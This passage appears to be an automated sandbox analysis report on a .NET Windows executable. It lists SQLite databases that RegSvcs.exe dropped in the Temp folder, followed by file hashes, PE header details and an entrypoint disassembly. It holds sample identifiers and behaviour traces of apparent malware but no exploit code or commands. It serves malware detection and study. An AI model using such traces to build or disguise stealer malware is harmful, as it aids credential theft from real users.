Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\Temp\tmp8D94.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8DB5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7A4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7A5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7B6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7C7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7C8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7C9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7D9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7EA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7EB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7FB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1BA.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1BB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1DB.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1EC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1ED.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE1FD.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE20E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpE20F.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9075051804442875
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	MfzXU6tKOq.exe
File size:	570'880 bytes
MD5:	3d63b777f65056b236ba51180cd37ce0
SHA1:	94a4653797f942c4f2eb1ac36707d66e5cef401f
SHA256:	d2ddb7d466186ab167e6799198ef76d678ad0ac098a5deacb5a99383aa54b717
SHA512:	10b6f38a651593a7fbb2209907b4ce16bfccb07db858dd826f27d3a5b8270cf4b09b4a54233e2804d3fcd909f775b5e5c85c0b6923ec65afbf767e46a341a37e
SSDEEP:	12288:5JjHQC3RbeXNMR4xfLH4mU7D+MCyWQNIQTkduiY0D:5tQC35eXN/fLo+MrWQNxkQiBD
TLSH:	A5C4120037F49BB2D5BE47F94C04725503BAA1176261EA1C0FC764DB2AA3B568D32F6B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...19@...............0.............B.... ........@.. ....................................@................................

File Icon


Icon Hash:	62ceac86b2968ea2

Static PE Info

General

Entrypoint:	0x48bb42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xDC403931 [Tue Feb 4 11:27:45 2087 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8baef	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x8c000	0x1470	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
